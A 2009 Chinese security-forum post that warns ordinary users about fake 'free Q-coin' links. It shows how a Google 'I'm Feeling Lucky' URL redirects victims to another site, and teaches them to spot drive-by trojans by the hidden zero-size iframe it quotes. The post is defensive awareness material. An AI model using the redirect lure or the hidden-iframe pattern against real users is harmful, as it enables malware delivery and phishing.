Board logo

标题: 细说小钓鱼网站,帮助大家认识一些基础的木马网页 [打印本页]

作者: 冰绿茶    时间: 2009-1-31 17:45     标题: 细说小钓鱼网站,帮助大家认识一些基础的木马网页

细说小钓鱼网站,帮助大家认识一些基础的木马网页
经常有朋友在QQ群里发这个,



对于我们的普通网民,很有可能真的点了,其实
无非就是利用瘴眼法,很多利用mp3.baidu .com....
大家记得一点就是了,天下没有免费的午餐,
QQ上好友给你发,很有可能是别人中毒了,自动发的,
所以你真想要QB,还是去买吧,
不要贪便宜,

我再来举例吧,大家先点下面的地址
http://www.google.cn/search?hl=zh-CN&q=hypost&btnI=%CA%D6%C6%F8%B2%BB%B4%ED
看这个地址,很多人可以利用这个方法可以去传播木马,广告语如下


大家好,快去免费拿QB,GOOGLE 公司发的
http://www.google.cn/search?hl=zh-CN&q=hypost&btnI=%CA%D6%C6%F8%B2%BB%B4%ED


普通网民直接点进去,
稍微有点上网概念了的,听说是google确实没有什么好怕的,点了,
真的点进去你会发现是我们的绅博,有些“坏人”可以用这样的方法达到
自己的目的,通过google,百度一些大站,把你们引入一个有木马的地址,
发点文章,希望大家明白一个道理,不要随便相信一个人,当然
如果我有天在站内发帖子说有免费的QB,可能是真的,因为确实腾讯经常送QB的活动
如果你是火狐的用户,你打开别人发你有木马的站基本上没什么问题

教大家来肉眼识别某个站是不是有木马,大家下载火狐后可以看到,
查看-页面源代码
里面如果出现
复制内容到剪贴板
代码:
<iframe src=htttp://XXX.htm width=0 height=0></iframe>
基本上99%可以告诉你这个就是挂马的,不相信大家可以下次看到别人发你的免费得QB,
你去查看下他们的代码,就明白了。
稍微解释下iframe:框架 ,width:宽度,height:高度
意思是在网页上调用了一个框架,但是高度和宽度全部是0,有些是1像素,
大家的肉眼是看不出来的,当然iframe 不是判断它是不是木马,关键是width=0 height=0
作为一个站长利用iframe 调用是很正常的,但是调用了却不让别人发现,这个就是心理有鬼。
这些木马基本上是做过免杀的,主流杀毒软件是查不出来的。
就算错,我也错到底!我的空间,我的世界





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2